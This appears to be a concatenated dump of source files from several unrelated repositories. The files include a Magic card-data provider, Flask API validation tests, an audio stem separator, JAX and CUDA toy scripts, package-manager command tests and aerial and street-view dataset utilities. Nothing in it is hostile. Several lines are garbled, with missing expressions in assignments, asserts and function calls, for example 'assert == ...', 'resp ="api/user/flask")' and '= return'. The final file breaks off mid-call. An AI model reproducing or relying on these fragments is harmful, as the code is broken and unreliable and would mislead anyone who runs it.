mapping from MTGO IDs (Regular & Foil) to MTGJSON UUIDs :param all_printings_path: AllPrintings to generate mapping from :return MTGO to MTGJSON mapping """ mtgo_to_mtgjson = dict() for card in get_all_cards_and_tokens(all_printings_path): identifiers = card["identifiers"] if "mtgoId" in identifiers: mtgo_to_mtgjson[identifiers["mtgoId"]] = card["uuid"] if "mtgoFoilId" in identifiers: mtgo_to_mtgjson[identifiers["mtgoFoilId"]] = card["uuid"] return mtgo_to_mtgjson ``` #### File: mtgjson5/providers/ ```python import logging from typing import Any, Dict, Union from singleton_decorator import singleton from ..providers.abstract import AbstractProvider from ..utils import retryable_session LOGGER = logging.getLogger(__name__) @singleton class MTGBanProvider(AbstractProvider): """ MTGBan container """ api_url: str = "{}" __mtgjson_to_card_kingdom: Dict[str, Dict[str, Dict[str, str]]] def __init__(self) -> None: """ Initializer """ super().__init__(self._build_http_header()) self.__mtgjson_to_card_kingdom = {} def _build_http_header(self) -> Dict[str, str]: """ Construct the Authorization header for MTGBan :return: Authorization header """ headers: Dict[str, str] = {} __keys_found: bool config = self.get_configs() if "MTGBan" not in config.sections(): LOGGER.warning("MTGBan section not established. Skipping alerts") self.__keys_found = False self.api_url = "" return headers if config.get("MTGBan", "api_key"): self.__keys_found = True self.api_url = self.api_url.format(config.get("MTGBan", "api_key")) else:"MTGBan keys values missing. Skipping imports") self.__keys_found = False self.api_url = "" return headers def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any: """ Download a URL :param url: URL to download from :param params: Options for URL download """ session = retryable_session() session.headers.update(self.session_header) response = session.get(url) self.log_download(response) return response.json() def get_mtgjson_to_card_kingdom(self) -> Dict[str, Dict[str, Dict[str, str]]]: """ Get MTGJSON to Card Kingdom translation table :return Compiled table for future use """ if not self.__keys_found: return {} if not self.__mtgjson_to_card_kingdom: self.__mtgjson_to_card_kingdom = return self.__mtgjson_to_card_kingdom ```
{ "source": "0b01001001/spectree", "score": 2 }
#### File: spectree/tests/ ```python import json from random import randint import pytest from flask import Flask, jsonify, request from flask.views import MethodView from spectree import Response, SpecTree from .common import JSON, Cookies, Headers, Query, Resp, StrDict, api_tag def before_handler(req, resp, err, _): if err: resp.headers["X-Error"] = "Validation Error" def after_handler(req, resp, err, _): resp.headers["X-Validation"] = "Pass" def api_after_handler(req, resp, err, _): resp.headers["X-API"] = "OK" api = SpecTree("flask", before=before_handler, after=after_handler, annotations=True) app = Flask(__name__) app.config["TESTING"] = True class Ping(MethodView): @api.validate( headers=Headers, resp=Response(HTTP_200=StrDict), tags=["test", "health"] ) def get(self): """summary description""" return jsonify(msg="pong") class User(MethodView): @api.validate( query=Query, json=JSON, cookies=Cookies, resp=Response(HTTP_200=Resp, HTTP_401=None), tags=[api_tag, "test"], after=api_after_handler, ) def post(self, name): score = [randint(0, request.context.json.limit) for _ in range(5)] score.sort(reverse=request.context.query.order) assert == "abcdefg" assert request.cookies["pub"] == "abcdefg" return jsonify(, score=score) class UserAnnotated(MethodView): @api.validate( resp=Response(HTTP_200=Resp, HTTP_401=None), tags=[api_tag, "test"], after=api_after_handler, ) def post(self, name, query: Query, json: JSON, cookies: Cookies): score = [randint(0, json.limit) for _ in range(5)] score.sort(reverse=query.order) assert == "abcdefg" assert request.cookies["pub"] == "abcdefg" return jsonify(, score=score) app.add_url_rule("/ping", view_func=Ping.as_view("ping")) app.add_url_rule("/api/user/<name>", view_func=User.as_view("user"), methods=["POST"]) app.add_url_rule( "/api/user_annotated/<name>", view_func=UserAnnotated.as_view("user_annotated"), methods=["POST"], ) # INFO: ensures that spec is calculated and cached _after_ registering # view functions for validations. This enables tests to access `api.spec` # without app_context. with app.app_context(): api.spec api.register(app) @pytest.fixture def client(): with app.test_client() as client: yield client def test_flask_validate(client): resp = client.get("/ping") assert resp.status_code == 422 assert resp.headers.get("X-Error") == "Validation Error" resp = client.get("/ping", headers={"lang": "en-US"}) assert resp.json == {"msg": "pong"} assert resp.headers.get("X-Error") is None assert resp.headers.get("X-Validation") == "Pass" resp ="api/user/flask") assert resp.status_code == 422 assert resp.headers.get("X-Error") == "Validation Error" client.set_cookie("flask", "pub", "abcdefg") for fragment in ("user", "user_annotated"): resp = f"/api/{fragment}/flask?order=1", data=json.dumps(dict(name="flask", limit=10)), content_type="application/json", ) assert resp.status_code == 200, resp.json assert resp.headers.get("X-Validation") is None assert resp.headers.get("X-API") == "OK" assert resp.json["name"] == "flask" assert resp.json["score"] == sorted(resp.json["score"], reverse=True) resp = f"/api/{fragment}/flask?order=0", data=json.dumps(dict(name="flask", limit=10)), content_type="application/json", ) assert resp.json["score"] == sorted(resp.json["score"], reverse=False) resp = f"/api/{fragment}/flask?order=0", data="name=flask&limit=10", content_type="application/x-www-form-urlencoded", ) assert resp.json["score"] == sorted(resp.json["score"], reverse=False) def test_flask_doc(client): resp = client.get("/apidoc/openapi.json") assert resp.json == api.spec resp = client.get("/apidoc/redoc") assert resp.status_code == 200 resp = client.get("/apidoc/swagger") assert resp.status_code == 200 ```
{ "source": "0b01/autobasstab-web", "score": 3 }
#### File: autobasstab-web/api/ ```python import os import ffmpeg import numpy as np # from spleeter import * # from import get_default_audio_adapter # from spleeter.separator import Separator # from spleeter.utils import * from django.conf import settings from .models import ProcessedTrack class SpleeterSeparator: """Performs source separation using Spleeter API.""" def __init__(self, config=None): """Default constructor. :param config: Separator config, defaults to None """ if config is None: self.audio_bitrate = '256k' self.audio_format = 'wav' self.sample_rate = 44100 self.spleeter_stem = 'config/4stems-16kHz.json' else: self.audio_bitrate = config['audio_bitrate'] self.audio_format = config['audio_format'] self.sample_rate = config['sample_rate'] self.spleeter_stem = config['spleeter_stem'] # Use librosa backend as it is less memory intensive self.separator = Separator(self.spleeter_stem, stft_backend='librosa', multiprocess=False) self.audio_adapter = get_default_audio_adapter() def separate(self, parts, input_path, dir_name, file_name): """Performs source separation by adding together the parts to be kept. :param parts: List of parts to keep ('vocals', 'drums', 'bass', 'other') :param input_path: Path to source file :param output_path: Path to output file :raises e: FFMPEG error """ waveform, _ = self.audio_adapter.load(input_path, sample_rate=self.sample_rate) prediction = self.separator.separate(waveform) out = np.zeros_like(prediction['vocals']) part_count = 0 ret = {} # Add up parts that were requested for key in prediction: dir = os.path.join(dir_name, key+".mp3"), dir), prediction[key], self.separator._sample_rate, self.audio_format, self.audio_bitrate) ret[key] = dir if parts[key]: out += prediction[key] part_count += 1 out /= part_count req_path = os.path.join(dir_name, file_name), req_path), out, self.separator._sample_rate, self.audio_format, self.audio_bitrate) ret["req"] = req_path return ret def cached(self, parts, source_track, dir_name, file_name): bass_path = ProcessedTrack.objects.filter(source_track=source_track, bass=True, vocals=False, other=False, drums=False).first() vocals_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=True, other=False, drums=False).first() other_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=False, other=True, drums=False).first() drums_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=False, other=False, drums=True).first() ret = { "bass": bass_path, "vocals": vocals_path, "other": other_path, "drums": drums_path, } load_paths = {k:ret[k] for k in parts if parts[k]} arrs = [self.audio_adapter.load(os.path.join(settings.MEDIA_ROOT, p))[0] \ for p in load_paths.values()] out = sum(arrs) / len(arrs) req_path = os.path.join(dir_name, file_name), req_path), out, self.separator._sample_rate, self.audio_format, self.audio_bitrate) ret["req"] = req_path return ret ```
{ "source": "0b01/jax", "score": 3 }
#### File: jax/examples/ ```python import numpy as onp import matplotlib.pyplot as plt import jax.numpy as np from tqdm import tqdm from jax import grad, jit, vmap, device_put from random import uniform N = 25 H_step = 0.1 H_0 = 10 g = -9.8 hoop_x, hoop_y = (10, 8) board = device_put(onp.random.rand(N)) # print(board) @jit def build_surface(board): ret = [] for i, (a,b) in enumerate(zip(board, board[1:])): y_0 = -i*H_step+H_0 x_0 = a + 10 y_1 = -(i+1)*H_step+H_0 x_1 = b + 10 slope = (y_1 - y_0) / (x_1 - x_0) intercept = y_1 - x_1 * slope ret.append([slope, intercept]) return ret @jit def solve_t(k, l, x_0, y_0, v_x0, v_y0): c = y_0 - k * x_0 - l b = v_y0 - k * v_x0 a = 0.5 * g d = (b**2) - (4*a*c) sol1 = (-b - np.sqrt(d))/(2*a) sol2 = (-b + np.sqrt(d))/(2*a) # print(sol1, sol2) y_1 = y_0 + v_y0*sol1 + 0.5*g*sol1 ** 2 y_2 = y_0 + v_y0*sol2 + 0.5*g*sol2 ** 2 return sol1, sol2, y_1, y_2 @jit def dist_from_hoop(t, y_f, x_0, v_x0, v_y0): x_f = x_0 + v_x0 * t v_xf = v_x0 v_yf = v_y0 + g * t cor = 0.81 # v_xb = -cor * v_xf v_yb = -cor * v_yf t = 0.1 x_b = x_f + v_xb * t y_b = y_f + v_yb * t + 0.5*g*t**2 # print("final_pos", x_b, y_b) dist = np.sqrt((x_b - hoop_x)**2 + (y_b - hoop_y)**2) return dist def bounce(board, x_0, y_0, v_x0, v_y0): lines = build_surface(board) # y_0 + v_y0*t + 0.5*g*t^2 = k(x_0 + v_x0*t) + l # (y_0 - k * x_0 - l) + (v_y0 - k * v_x0)*t + 0.5*g*t^2 = 0 for i, (k, l) in enumerate(lines): sol1, sol2, y_1, y_2 = solve_t(k, l, x_0, y_0, v_x0, v_y0) t = 0 y_f = 0 if sol1 > 0 and -(i+1)*H_step+H_0 < y_1 < -i*H_step+H_0: t = sol1 y_f = y_1 elif sol2 > 0 and -(i+1)*H_step+H_0 < y_2 < -i*H_step+H_0: t = sol2 y_f = y_2 else: continue loss = dist_from_hoop(t, y_f, x_0, v_x0, v_y0) return loss return 0. # print(bounce(board, 3.1, 4, 10, 10)) def plot(): plt.figure(figsize=(12,6)) # xs = np.arange(8, 12, 0.1); # for m, k in build_surface(board): # ys = xs * m + k # plt.plot(xs, ys) for i, x in enumerate(board): y = -i*H_step+H_0 print(x+10, y) plt.scatter(x+10, y) plt.xlim(0, 12) plt.ylim(0, 12) plt.scatter(hoop_x, hoop_y, s=300) plt.xlabel('x') plt.ylabel('y') # plot() plt.savefig("orig.png") for i in tqdm(range(3000)): x0 = 0 y0 = 5 vx = uniform(7, 10) vy = uniform(7, 10) board_grad = grad(bounce, 0)(board, x0, y0, vx, vy) # print(board_grad) board += -board_grad * 0.1 plot() plt.savefig("optimized.png") ```
{ "source": "0b10010010/CUDAKalmanFilter", "score": 3 }
#### File: CUDAKalmanFilter/test/ ```python import numpy as np from timeit import default_timer as timer from numba import vectorize @vectorize(["float32(float32, float32)"], target='cuda') def VectorAdd_GPU(a, b): return a + b def VectorAdd_CPU(a, b, c): for i in range(a.size): c[i] = a[i] + b[i] def main(): N = 3200000 A = np.ones(N, dtype=np.float32) B = np.ones(N, dtype=np.float32) C = np.zeros(N, dtype=np.float32) start = timer() VectorAdd_CPU(A, B, C) vectoradd_cpu_time = timer() - start start = timer() C = VectorAdd_GPU(A, B) vectoradd_gpu_time = timer() - start print("VectorAdd_CPU took %f seconds" % vectoradd_cpu_time) print("VectorAdd_GPU took %f seconds" % vectoradd_gpu_time) if __name__ == '__main__': main() ```
{ "source": "0b10/qsm", "score": 2 }
#### File: qsm/tests/ ```python from qsm.remote import update, install, remove import re # >>> UPDATE >>> def test_update_returns_a_string(): assert isinstance(update(), str), "did not return a string" def test_update_returns_an_expected_value(): assert"dnf update -y", update() ), "did not return an update script" # >>> INSTALL >>> def test_install_returns_a_string(): assert isinstance(install("vim nano"), str), "did not return a string" def test_install_returns_an_expected_value(): assert"dnf install -y vim", install("vim") ), "did not return an install script" # >>> REMOVE >>> def test_remove_returns_a_string(): assert isinstance(remove("vim nano"), str), "did not return a string" def test_remove_returns_an_expected_value(): assert"dnf remove -y vim nano", remove("vim nano") ), "did not return an install script" ```
{ "source": "0b3d/dkmkpy", "score": 3 }
#### File: renderer/pyfiles/ ```python import psycopg2, pickle #Define function to query info, return a tuple def query_attributes(locations): size = 0.0005 line_list = [] point_list = [] polygon_list = [] for location in locations: lat, lon = location[0], location[1] # , leisure, tourism, railway, water, tags query1 = """ SELECT name, highway FROM planet_osm_line WHERE planet_osm_line.way && ST_Transform( ST_MakeEnvelope({}, {}, {}, {}, 4326),3857 ) and name <> '<NAME>' and highway <> ''; """ query1 = query1.format(lon-size,lat-size,lon+size,lat+size) cur.execute(query1) res = cur.fetchall() line_list.append(res) # Query data from points query2 = """ SELECT amenity, building, religion, shop, tourism, tags FROM planet_osm_point WHERE planet_osm_point.way && ST_Transform( ST_MakeEnvelope({}, {}, {}, {}, 4326),3857 ); """ query2 = query2.format(lon-size,lat-size,lon+size,lat+size) cur.execute(query1) res = cur.fetchall() point_list.append(res) # Query data from polygons query3 = """ SELECT amenity, landuse, shop, building, sport, tags FROM planet_osm_polygon WHERE planet_osm_polygon.way && ST_Transform( ST_MakeEnvelope({}, {}, {}, {}, 4326),3857 ); """ query3 = query3.format(lon-size,lat-size,lon+size,lat+size) cur.execute(query2) res = cur.fetchall() polygon_list.append(res) return line_list, point_list, polygon_list # Query the main information conn = psycopg2.connect("dbname='gis' user='postgres' host='f978bc0bd1f8'") cur = conn.cursor() query = """ SELECT ST_Y((dp).geom), ST_X((dp).geom), name, highway, junction, sidewalk, lit, lanes, noexit FROM( SELECT ST_DumpPoints(ST_Transform(way,4326)) AS dp, name, highway, junction, tags->'sidewalk' as sidewalk, tags->'lit' as lit, tags->'lanes' as lanes, tags->'noexit' as noexit FROM planet_osm_line WHERE name = '<NAME>' and highway <> '' ORDER BY name ) As foo; """ cur.execute(query) locations = cur.fetchall() line, point, polygon = query_attributes(locations) for location in locations: print(location[0:2]) for entry in line: print(entry) # #Now query noexit points # #query = """ SELECT ST_X(ST_Transform(way,4326)), ST_Y(ST_Transform(way,4326)) -- tags # #FROM planet_osm_point # #WHERE tags @> 'noexit=>yes'::hstore; # #""" # #cur.execute(query) # #noexit = cur.fetchall() # #for entry in noexit: # # print(entry) # query_limits = """ # select min(st_xmin(st_transform(way,4326))), min(st_ymin(st_transform(way,4326))), max(st_xmax(st_transform(way,4326))), max(st_ymax(st_transform(way,4326))) from planet_osm_line where name<>'' and highway<>''; # """ # cur.execute(query_limits) # extreme = cur.fetchall() # print("Minimun , Maximum :") # print(extreme) # #-------Save in a Pickel File ----------------------------- # #file_path = "/map_data/locations_data.pkl" # #with open( file_path, 'wb') as f: # # pickle.dump(locations, f) ```
{ "source": "0b3d/Image-Map-Embeddings", "score": 3 }
#### File: Image-Map-Embeddings/aerial/ ```python import os import cv2 import numpy as np from aerial.tile import Tile, deg2num, num2deg from utils.util import haversine def get_area_extents(): areas = { 'London_test' : [51.4601825, -0.1282832, 51.5477509, -0.0544434], 'SP50NW': [51.7414809, -1.2772553, 51.7859644, -1.2040581], 'ST57SE2014' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ], 'ST57SE2016' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ], 'ST57SE2017' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ] } return areas def get_aerial_directory(areaname): directories = { 'London_test' : 'aerial_tiles', 'SP50NW': 'aerial_tiles', 'ST57SE2014' : 'ST57SE_aerial_tiles_2014', 'ST57SE2016' : 'ST57SE_aerial_tiles_2016', 'ST57SE2017' : 'aerial_tiles' } return directories[areaname] def get_readable_name(areaname): areas = { 'London_test' : 'London', 'SP50NW': 'Oxford', 'ST57SE2014' : 'Bristol 2014', 'ST57SE2016' : 'Bristol 2016', 'ST57SE2017' : 'Bristol 2017' } return areas[areaname] class Area(): def __init__(self, name, dataroot, results_dir, extent=None, zoom=18): = name self.dataroot = dataroot self.results_dir = results_dir self.zoom = zoom self.dir = get_aerial_directory(name) self.readable_name = get_readable_name(name) total_extent_of_the_area = get_area_extents()[name] self.totalbbox = total_extent_of_the_area if extent is None: # Remove 5% in edges strip_lat = 0.05*(total_extent_of_the_area[2] - total_extent_of_the_area[0]) strip_lon = 0.05*(total_extent_of_the_area[3] - total_extent_of_the_area[1]) extent_without_edges = [total_extent_of_the_area[0]+strip_lat, total_extent_of_the_area[1]+strip_lon, total_extent_of_the_area[2]-strip_lat, total_extent_of_the_area[3]-strip_lon] else: extent_without_edges = extent self.workingbbox = extent_without_edges self.world_size_x = haversine(extent_without_edges[0], extent_without_edges[1], extent_without_edges[0], extent_without_edges[3]) self.world_size_y = haversine(extent_without_edges[0], extent_without_edges[1], extent_without_edges[2], extent_without_edges[1]) self.arcllat = self.workingbbox[2]-self.workingbbox[0] self.arcllon = self.workingbbox[3]-self.workingbbox[1] # Define an inner boundary where the robot should start to turn strip_lat = 0.10*(extent_without_edges[2] - extent_without_edges[0]) strip_lon = 0.10*(extent_without_edges[3] - extent_without_edges[1]) innerbbox = [extent_without_edges[0]+strip_lat, extent_without_edges[1]+strip_lon, extent_without_edges[2]-strip_lat, extent_without_edges[3]-strip_lon] self.innerbbox = innerbbox def get_routes(self, seed=440): path = os.path.join('aerial','routes', + '_' + str(seed) + '.npz') routes = np.load(path)['routes'] return routes def get_commands(self, seed=440): path = os.path.join('aerial', 'routes', + '_' + str(seed) + '.npz') routes = np.load(path)['commands'] return routes def get_working_bbox_in_tile_coordinates(self): extent =self.workingbbox xmin, ymin = deg2num(extent[2],extent[1],self.zoom) xmax, ymax = deg2num(extent[0],extent[3],self.zoom) return [ymin, xmin, ymax, xmax] def get_total_bbox_in_tile_coordinates(self): extent =self.totalbbox xmin, ymin = deg2num(extent[2],extent[1],self.zoom) xmax, ymax = deg2num(extent[0],extent[3],self.zoom) return [ymin, xmin, ymax, xmax] def get_area_size_in_tiles(self): ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates() W = xmax - xmin + 1 H = ymax - ymin + 1 return (H,W) def get_arclength(self): arcllat = self.workingbbox[2]-self.workingbbox[0] arcllon = self.workingbbox[3]-self.workingbbox[1] return (arcllat,arcllon) def get_tile_coords(self): coords = [] tile_zooms = [self.zoom] for z in tile_zooms: x = np.arange(self.xmin,self.xmax+1,1) y = np.arange(self.ymin,self.ymax+1,1) x = np.tile(x,self.H) y = np.repeat(y,self.W) z = np.tile(z,self.H*self.W) grid = np.stack([x,y,z],1) coords.append(grid) coords = np.concatenate(coords, 0) return coords def get_map_grid_for_mpl(self): ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates() max_lat, min_lon = num2deg(xmin, ymin, self.zoom) min_lat, max_lon = num2deg(xmax+1,ymax+1, self.zoom) grid = [min_lon,max_lon,min_lat,max_lat] return grid def get_map(self, style='ordnance',filepath=None): if filepath is None: filename = os.path.join('aerial','maps', + '_' + style + '.png') else: filename = filepath area_map = cv2.imread(filename) if area_map is None: raise FileExistsError(filename) return area_map def create_area_map(self, H, W, save=False, name=None): area_map = [] ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates() for i in range( ymin, ymax+1): row = [] for j in range(xmin, xmax+1): coords = (int(j),int(i), self.zoom) mapa = Tile(coords, self.dataroot).get_tile(domain='map') #mapa = cv2.resize(mapa,(64,64)) row.append(mapa) row = np.concatenate(row,1) area_map.append(row) area_map = np.concatenate(area_map, axis=0) area_map = cv2.resize(area_map,(W,H)) if save: map_name = + '_ordnance.png' if name is None else name cv2.imwrite(os.path.join('aerial','maps', map_name), area_map) return area_map def m2deg(self, disp_in_meters): arclengthlat = disp_in_meters[0] * self.arcllat / (1000*self.world_size_y) arclengthlon = disp_in_meters[1] * self.arcllon / (1000*self.world_size_x) return (arclengthlat, arclengthlon) def get_map_descriptors(self, model, epoch='latest'): dataFilename = os.path.join( self.results_dir, model, epoch + '_' + + '_z_' + str(self.zoom) + '.npz') descriptors = np.load(dataFilename)['X'] area_coords = np.load(dataFilename)['coords'] # Take descriptors of the subarea only ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates() indices_x = np.arange( xmin , xmax + 1 ) - area_coords[0,:,0,3].min() indices_y = np.arange( ymin , ymax + 1 ) - area_coords[:,0,0,2].min() indices_x = np.expand_dims(indices_x,0).astype(int) indices_y = np.expand_dims(indices_y,1).astype(int) descriptors = descriptors[indices_y,indices_x] working_coords = area_coords[indices_y,indices_x] return (descriptors, working_coords) def show(self): area_map = self.get_map(1280, 720) cv2.imshow(, area_map) cv2.waitKey(0) if __name__ == "__main__" : dataroot = os.path.join(os.environ['DATASETS'],'digimap_data') area = Area('ST57SE', dataroot) mymap = area.create_area_map(512,512) cv2.imshow('mymap', mymap) cv2.waitKey(0) cv2.destroyWindow('mymap') ``` #### File: Image-Map-Embeddings/aerial/ ```python import numpy as np from aerial.tile import deg2num, num2deg from math import sqrt def deg2num_rect(extent, zoom=18): x_min, y_min = deg2num(extent[2],extent[1], zoom) x_max, y_max = deg2num(extent[0],extent[3], zoom) return [x_min, y_min,x_max, y_max] def get_XY_size(extent, zoom=18): XYextent = deg2num_rect(extent, zoom) H = XYextent[3] - XYextent[1] W = XYextent[2] - XYextent[0] return H,W def get_uniform_coords_in_extent(extent, scale_factor=2, zoom=18): H, W = get_XY_size(extent, zoom) new_H = H * scale_factor new_W = W * scale_factor lat = np.linspace(extent[2], extent[0], new_H) lon = np.linspace(extent[1], extent[3], new_W) lon = np.tile(lon,new_H) lat = np.repeat(lat,new_W) z = np.tile(zoom,new_H*new_W) coords = np.stack([lat,lon,z],1) return coords def get_extent(coords): test = coords[0][0].item() isXY = test.is_integer() if isXY: min_x, min_y = coords[:,:2].min(0) max_x, max_y = coords[:,:2].max(0) z = coords[0,2].item() max_lat, min_lon = num2deg(min_x, min_y, z) min_lat, max_lon = num2deg(max_x+1, max_y+1, z) extent = [min_lat, min_lon, max_lat, max_lon] else: min_lat, min_lon = coords[:,:2].min(0) max_lat, max_lon = coords[:,:2].max(0) extent = [min_lat, min_lon, max_lat, max_lon] return extent, isXY def get_grid(descriptors, original_extent, working_extent, scale_factor, zoom=18): area_extent_xy = deg2num_rect(original_extent, zoom) working_extent_xy = deg2num_rect(working_extent,zoom) H,W = get_XY_size(original_extent, zoom) new_H, new_W = H*scale_factor, W*scale_factor min_x = (working_extent_xy[0] - area_extent_xy[0])*scale_factor min_y = (working_extent_xy[1] - area_extent_xy[1])*scale_factor max_x = (working_extent_xy[2] - area_extent_xy[0])*scale_factor max_y = (working_extent_xy[3] - area_extent_xy[1])*scale_factor descriptors = np.reshape(descriptors,(int(new_H),int(new_W),-1)) descriptors = descriptors[min_y:max_y+1,min_x:max_x+1] return descriptors def get_scale_factor(original_num_elements, current_num_elements): return int(sqrt(current_num_elements / original_num_elements)) ``` #### File: Image-Map-Embeddings/aerial/ ```python import cv2 import numpy as np import math class Homography(): def __init__(self, first_frame, verbose=False): """ Implements a class that estimates the Homography using point correspondances. """ self.old = first_frame self.old_gray = cv2.cvtColor(first_frame, cv2.COLOR_BGR2GRAY) self.orb = cv2.ORB_create() self.old_kp, self.old_des = self.orb.detectAndCompute(self.old_gray, None) self.old_frame = first_frame self.old_yaw = 0.0 self.old_t = np.array([0.0,0.0]) self.verbose = verbose def estimate(self, frame): """ This method estimates translation and yaw from the homography """ new_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) new_kp, new_des = self.orb.detectAndCompute(new_gray, None) if new_des is not None and self.old_des is not None: matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING) matches = matcher.match(self.old_des, new_des) matches = sorted(matches, key= lambda x:x.distance) npoints = len(matches) if npoints > 100: points1 = np.zeros((len(matches),2), dtype=np.float32) points2 = np.zeros((len(matches),2), dtype=np.float32) for i,match in enumerate(matches): points1[i, :] = self.old_kp[match.queryIdx].pt points2[i, :] = new_kp[match.trainIdx].pt h, mask = cv2.findHomography(points1, points2, cv2.RANSAC) nransac = (mask==1).sum() if nransac > 50: matchesMask = mask.ravel().tolist() img = cv2.drawMatches(self.old_frame, self.old_kp, frame, new_kp, matches, None, matchesMask=matchesMask) hn = h / h[2,2] t = hn[:2,2] sy = math.sqrt(hn[0,0]*hn[0,0] + hn[1,0]*hn[1,0]) singular = sy < 1e-6 if not singular: yaw = math.atan2(hn[1,0],hn[0,0]) else: yaw = 0 self.old_yaw = yaw self.old_t = t else: if self.verbose: print("Warning! not enough points in ransac") yaw = self.old_yaw t = self.old_t img = frame else: if self.verbose: print("Warning! not enough matched points") yaw = self.old_yaw t = self.old_t img = frame else: yaw = self.old_yaw t = self.old_t img = frame self.old_frame = frame self.old_kp = new_kp self.old_des = new_des return yaw, t, img ``` #### File: Image-Map-Embeddings/data/ ```python import cv2 import random import numpy as np import torch from PIL import Image import torchvision.transforms as transforms from slutils.area import Area from slutils.utils import rotate_panorama from data.base_dataset import BaseDataset from data.transforms import AddGaussianNoise, RandomErasing from utils.util import tensor2im def random_crop(tile, size_t=224, size_final=128): """ Crop and add noise to the tile""" w, h = tile.shape[0:2] delta = h - size_t ht = np.random.randint(0, delta) wt = ht temp_tile = tile[ht:h-ht, wt:w-wt] tile = cv2.resize(temp_tile, (size_final,size_final)) return tile def get_transforms(preprocess): transform_list = [] transform_list += [transforms.ToTensor()] if 'normalize' in preprocess: transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))] if 'erasing' in preprocess: transform_list += [RandomErasing(p=0.75, scale=(0.01, 0.10), ratio=(0.2, 0.8), value='random', inplace=True)] if 'noise' in preprocess: transform_list += [AddGaussianNoise(mean=0.0, std=0.01)] return transforms.Compose(transform_list) class StreetLearnDataset(BaseDataset): """A customized dataset Class for StreetLearn data """ @staticmethod def modify_commandline_options(parser, is_train): parser.set_defaults(dataroot='streetlearn', tile_size=128, area='train', domain=['X','Y']) parser.add_argument('--pano_size', type=int, default=128, help='Panorama size') parser.add_argument('--panorama_mode', type=str, default='list', help='Input mode for the panorama pano|grid|list') parser.add_argument('--no_local_rotation', action='store_true', help='Disable rotations and fliping at location level') parser.add_argument('--no_map_random_crop', action='store_true', help='Disable random cropping for the map tile') parser.add_argument('--no_aligned', action='store_true', help='Disabled tile and panorama aligment') parser.add_argument('--flips', action='store_true', help='If specified use flippling for data augmentation') parser.add_argument('--no_rotations', action='store_true', help='Disable rotations for data augmentation') if is_train: parser.set_defaults(preprocess='erasing,normalize') else: parser.set_defaults(preprocess='normalize', batch_size=100, flips=False, num_augmentations=1, serial_batches=True) return parser def __init__(self, opt): """Initialize this dataset class. Parameters: opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions """ BaseDataset.__init__(self, opt) self.area = Area(opt.area, opt.dataroot) self.dataroot = opt.dataroot def __getitem__(self, index): """ Gets a sample location including augmentations. Parameters: index -- Index of the location. Returns a dictionary that contains X (tensor) - - Map tiles' tensor with shape [batch_size, num_augmentations, num_channels, width, heigth] Y (tensor) - - Panoramas tensor with shape [batch_size, direction*, num_augmentations, num_channels, width, heigth] * Only exists when panorama_mode is 'list' labels (tensor) -- A tensor with the location labels index (int) - - index of location paths (str) - - Path to panorama (used for some visualizations) """ zooms = [18,19] if self.opt.isTrain else [self.opt.tile_zoom] loc = self.area.get_location(index, zooms=zooms) X, Y = [],[] flip = (random.random() > 0.5) if self.opt.flips else False # It will be applied to both domains rotation = 0.0 if self.opt.no_rotations else random.choice([0,-270,-180,-90]) # It will be applied to both domains for _ in range(self.opt.num_augmentations): # local rotation parameters if not self.opt.no_local_rotation and not self.opt.no_rotations: tile_rotation = random.choice([0,-270,-180,-90]) pano_rotation = random.uniform(-180,180) if self.opt.no_aligned else tile_rotation else: tile_rotation=rotation pano_rotation=rotation zoom = np.random.randint(18,20) if self.opt.isTrain else self.opt.tile_zoom tile = loc.get_tile(zoom=zoom, rotation=tile_rotation, flip=flip) if not self.opt.no_map_random_crop: tile = random_crop(tile,size_final=self.opt.tile_size) else: if not (tile.shape[0] == self.opt.tile_size): tile = cv2.resize(tile,(self.opt.tile_size,self.opt.tile_size)) tile = cv2.cvtColor(tile, cv2.COLOR_BGR2RGB) tile = Image.fromarray(tile) tile = get_transforms(self.opt.preprocess)(tile) X.append(tile) # Get panorama if self.opt.panorama_mode == 'grid': pano = [loc.get_snaps(size=self.opt.pano_size, mode='grid', flip=flip, rotation=pano_rotation, noise=self.opt.isTrain)] elif self.opt.panorama_mode == 'list': pano = loc.get_snaps(size=self.opt.pano_size, mode='list', flip=flip, rotation=pano_rotation, noise=self.opt.isTrain) #[F,L,R,B] elif self.opt.panorama_mode == 'pano': yaw = rotation + np.random.normal(0,5) # A small random rotation pitch = np.random.normal(0,5) roll = np.random.normal(0,5) pano = loc.get_pano(flip=flip, size=(self.opt.pano_size*2,self.opt.pano_size)) pano = [rotate_panorama(pano, roll, pitch, yaw)] else: raise Exception('Panorama mode {} not found'.format(self.opt.panorama_mode)) for img in pano: img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = Image.fromarray(img) img = get_transforms(self.opt.preprocess)(img) Y.append(img) X = torch.stack(X, dim=0) Y = torch.stack(Y, dim=0) if self.opt.panorama_mode == 'list': lista = torch.chunk(Y, self.opt.num_augmentations, dim=0) Y = torch.stack(lista, dim=0) sample = {'X':X, 'Y':Y} sample['labels'] = torch.full((1, self.opt.num_augmentations), index) sample['paths'] = str(index) + '.jpg' sample['index'] = index return sample def show_dataset(self,examples=2): for _ in range(examples): index = np.random.randint(0,self.__len__()) sample = self.__getitem__(index) print(sample['Y'].size()) if self.opt.panorama_mode == 'list': snaps = torch.chunk(sample['Y'],4,dim=1) pano =, dim=4).squeeze() else: pano = sample['Y'] for i in range(self.opt.num_augmentations): X = sample['X'][i] Y = pano[i] imA = tensor2im(X.view(1,X.size(0),X.size(1),X.size(2))) imB = tensor2im(Y.view(1,Y.size(0),Y.size(1),Y.size(2))) imA = cv2.cvtColor(imA, cv2.COLOR_RGB2BGR) imB = cv2.cvtColor(imB, cv2.COLOR_RGB2BGR) if imA.shape[0] != imB.shape[0]: cv2.imshow("Tile", 